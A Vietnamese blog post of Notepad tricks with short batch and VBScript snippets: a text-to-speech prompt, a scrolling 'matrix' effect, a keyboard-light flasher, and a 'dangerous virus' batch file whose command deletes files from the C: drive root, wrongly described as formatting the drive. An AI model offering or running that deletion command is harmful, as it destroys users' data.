Những thủ thuật thú vị với Notepad

Nếu bạn đang sử dụng hệ điều hành Windows thì sẽ quá quen thuộc với tiện ích Notepad, một công cụ soạn thảo văn bản đơn giản của Windows. Nhưng không phải ai cũng biết đến những thủ thuật thú vị với Notepad dưới đây …

Tạo ra một “con virus” nguy hiểm

Có lẽ đây sẽ là một trong những con virus nguy hiểm nhất mà bạn có thể tạo ra. Nó có tác dụng … format ổ C của bạn. Hãy cẩn trọng !

Cách làm :
– Mở Notepad
– Copy đoạn code dưới đây vào khung soạn thảo

@Echo off

Del C:\ *.* |y

– Lưu dưới đuôi .BAT (ví dụ : TTND_Format.BAT)
– Chạy file

Lưu ý : Chúng tôi sẽ không chịu trách nhiệm nào khi bạn thực thi “con virus” trên máy của mình đâu nhé. Cẩn thận !

Làm cho máy tính của bạn “mở miệng” nói

– Tương tự, bạn tạo ra 1 file với đuôi .VBS (ví dụ TTND_Maynoi.VBS) với nội dụng như sau :

Dim message, sapi
message=InputBox(“Hat cho toi nghe di nao?”,”Ok baby”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message

– Chạy file

Lưu ý : các bạn có thể thay đổi nội dung mà máy tính sẽ đọc trong đoạn code trên. Tuy nhiên, đừng quá trông mong nhiều vào việc viết tiếng Việt mà bắt máy đọc chuẩn nhé :D.

Hiệu ứng ma trận

matix

Có lẽ đây là một trong những hiệu ứng trong mấy phim về tài hack hay viễn tưởng đây.

 

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

– Lưu với tên .BAT (ví dụ : TTND_Matran.BAT)

Lưu ý : Bạn có thể thêm vào nhiều biến %random để mở rộng kích thước cửa sổ ma trận.

Làm bàn phím nhảy múa

Hiệu ứng chớp nháy các đèn Numlock, Capslock, Scrolllock

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

– Lưu với tên .VBS (ví dụ : TTND_Dance.VBS)

Lưu ý : Các file VBS không phải lúc nào cũng có thể chạy trên mọi phiên bản Windows.

Add a Comment

Your email address will not be published. Required fields are marked *